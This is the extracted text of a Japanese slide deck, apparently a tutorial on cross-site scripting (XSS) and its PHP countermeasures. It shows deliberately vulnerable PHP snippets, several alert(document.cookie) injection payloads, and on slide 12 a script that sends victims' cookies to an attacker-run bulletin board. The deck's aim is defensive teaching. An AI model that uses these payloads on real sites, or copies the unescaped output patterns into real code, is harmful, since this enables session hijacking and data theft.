Recommended
More Related Content
What's hot
What's hot (20)
Similar to 体系的に学ばないXSSの話
Similar to 体系的に学ばないXSSの話 (20)
Recently uploaded
Recently uploaded (8)
体系的に学ばないXSSの話
- 2. XSSとは
- 3. XSS(クロスサイト・スクリプティング) ● Webアプリケーションのセキュリティホール ● 悪意のあるコードをユーザに送ってしまう脆弱性 ● 動的にWebページを生成する箇所で発生 ● HTMLエスケープ漏れを利用した攻撃 ● サイト全体の1カ所でもXSS脆弱性があると被害を受ける
- 4. HTMLエスケープ メタ文字 変換後 < < > > & & " " ' ' ← こんな感じで表示するため
- 5. XSSの例
- 9. なにが問題か?
- 10. ● Cookieが盗まれる ● 個人情報が盗まれる ● 勝手に操作される ● 他いろいろ
- 11. 現実的な攻撃の流れ
- 12. 1.XSS入りの、ECサ イトへのURLを投稿 2chとか 攻撃者 ECサイトとか (https://test.ec.com) しょぼい掲示板サイト (http://syoboi.com) Cookieを投稿 3.攻撃スクリプト が実行される 投稿者:xxxxxxx メッセージ: Xs3Loa9J3iK42KPlqS76 投稿者:xxxxxxx メッセージ: Zk0oQis6N2lkqJu8MaxC ・・・ 利用者 2.XSS入りのURL経由で ECサイトにアクセス (※既にログイン済みである必要がある) var xhr = new XMLHttpRequest(); xhr.open('GET', 'http://syoboi.com/post?p='+document.cooki); xhr.send(null);
- 13. ● HTMLの要素内容や、属性値を動的に出力する場 合は、「<」、「>」、「&」、「"」、「'」をエスケープする PHPでは、htmlspecialchars()関数 CakePHPでは、h()関数や、Formヘルパーを利用 ※デフォルトでは、htmlspecialcharsは「'」をエスケープせず、 h()関数は全てエスケープする htmlspecialcharsには、ENT_QUOTESを引数として渡すように徹底してもよいかも! ● 属性値はダブルクォートで囲む <input type="text" name="x" value="<?php echo $x ?>"> 対策方法・・・の一部
- 14. 脆弱性が発生する例
- 15. <?php $mail = $_GET['mail']; ?> <input type="text" name="mail" value="<?php echo $mail ?>"> <input type="text" name="mail" value="1"> <script>alert(document.cookie)</script>"> 動的に要素や属性値を出力するときは、「<」、「>」、「&」、「"」、 「'」を必ずエスケープする 「1"><script>alert(document.cookie)</script>」
- 16. <?php $mail = htmlspecialchars($_GET['mail'], ENT_QUOTES); ?> <input type=text name=mail value=<?php echo $mail ?>> <input type=text name=mail value=1 onmouseover=alert(document.cookie)> 属性値は必ず、「"」や「'」の引用符で囲みましょう ※「"」で囲むことを推奨 「1 onmouseover=alert(document.cookie)」
- 17. <a href="javascript:alert(document.cookie)">クリックしてね </a> <?php $url = htmlspecialchars($_GET['url'],ENT_QUOTES); ?> <a href="<?php echo $url ?>">クリックしてね</a> a要素のhref属性、img、frame、iframe要素のsrc属性は、 http、httpsスキームであることをチェックし、URLをホワイトリ ストにするなどの対策をする 「javascript:alert(document.cookie)」
- 18. <?php $param = htmlspecialchars($_GET['param'], ENT_QUOTES); ?> <... onclick="methodA('<?php $param ?>')"> <... onclick="methodA(''); alert(document.cookie)//')"> イベントハンドラ系は文字参照が解釈されてしまい、alertが実 行される JavaScriptの文字列リテラルとしてエスケープしてから、 HTMLエスケープする必要がある 「');alert(document.cookie)//」
- 19. 対策まとめ+α
- 20. ● HTMLの要素内容や、属性値を動的に出力する場 合は、「<」、「>」、「&」、「"」、「'」をエスケープする PHPでは、htmlspecialchars()関数 CakePHPでは、h()関数や、Formヘルパーを利用 ※デフォルトでは、htmlspecialcharsは「'」をエスケープせず、 h()関数は全てエスケープする htmlspecialcharsには、ENT_QUOTESを引数として渡すように徹底してもよいかも! ● 属性値はダブルクォートで囲む <input type="text" name="x" value="<?php echo $x ?>">
- 21. ● aタグやimgタグなどのURL動的生成は、以下のよ うな対策を行った上で、HTMLエスケープする ・ホワイトリスト形式にする ・http、httpsスキームであることをチェックする ● onclickなどのイベントハンドラは、JavaScriptとし てエスケープした上で、HTMLエスケープする ● script要素内の動的生成は、JavaScriptとしてエ スケープし、「</」が出力されないようにする
- 22. ● HTTPレスポンスに文字エンコーディングを明示 する header('Content-Type: text/html; charset=UTF-8'); ● DBに格納されているデータを利用する場合も同 様の対処をする(格納型 XSS) ● JavaScriptで動的にHTMLを生成する場合もエス ケープを忘れない(DOM Based XSS)
- 23. 保険的対策
- 24. ● CookieのHttpOnly属性を設定 JavaScriptからCookieを参照できなくする php.ini → session.cookie_httponly = on ● ブラウザのXSSフィルタ機能を頼る →却下。
- 25. 余談・・・